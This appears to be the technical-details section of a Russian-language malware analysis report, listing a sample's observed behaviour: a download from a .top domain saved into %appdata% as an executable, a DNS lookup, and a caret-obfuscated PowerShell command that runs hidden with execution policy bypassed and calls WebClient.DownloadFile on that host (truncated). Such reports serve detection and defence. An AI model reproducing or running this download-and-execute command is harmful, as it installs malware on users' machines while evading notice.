Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^ErS^h^Ell.e^xE -^exeCUti^oNP^oli^cy ^by^P^a^S^S^ ^-^NO^p^rOFIlE -w^InDOwSTyLE ^H^id^d^EN ^(N^E^W^-o^bJ^EC^t SyStEM.Net.web^CLIE^N^T).^d^OWN^L^oAd^FilE(^'http://footarepu....
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "POW^ErS^h^Ell.e^xE -^exeCUti^oNP^oli^cy ^by^P^a^S^S^ ^-^NO^p^rOFIlE -w^InDOwSTyLE ^H^id^d^EN ^(N^E^W^-o^bJ^EC^t SyStEM.Net.web^CLIE^N^T).^d^OWN^L^oAd^FilE(^'http://footarepu....' (со скрытым окном)